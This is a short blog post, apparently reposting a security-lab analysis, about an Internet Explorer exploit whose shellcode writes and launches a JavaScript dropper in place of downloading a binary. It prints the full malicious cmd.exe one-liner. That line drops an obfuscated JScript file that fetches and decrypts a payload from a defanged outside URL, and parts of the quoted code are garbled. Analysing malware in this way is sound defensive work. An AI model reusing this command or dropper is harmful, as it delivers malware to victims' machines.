In a typical drive-by-download attack scenario the
shellcode would download and execute a malware binary. The malware
binary is usually wrapped in a dropper that unpacks or de-obfuscates and
executes it. Droppers’ main goal is to launch malware without being
detected by antiviruses and HIPS. Nowadays the most popular way of
covert launching would probably be process hallowing. Recently we found a couple of curious specimen that does not follow this fashion. These cases are not new, but we thought they’re worth mentioning because we’ve been seeing quite a few of those lately.
One of them is the shellcode from an Internet Explorer exploit, which
instead of downloading a binary executes the following CMD command:
Windows/syswow64/cmd.exe
cmd.exe /q /c cd /d "%tmp%" && echo var
w=g("WScript.Shell"),a=g("Scripting.FileSystemObject"),w1=WScript;try{m=w1.Arguments;u=600;o="***";w1.Sleep(u*u);var
n=h(m(2),m(1),m(0));if
(n.indexOf(o)^>3){k=n.split(o);l=k[1].split(";");for (var
i=0;i^b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&255,n=c[b],c[b]=c[l],c[l]=n;for(var
p=l=b=0;p^wtm.js && start wscript //B wtm.js
"y0fz0r5qF2MT" "hxxp://mediafilled.com/?utm_source=48853" "Mozilla/4.0
(compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET
CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC
6.0)"
https://labs.bromium.com/2015/06/12/oh-look-javascript-droppers/
No comments:
Post a Comment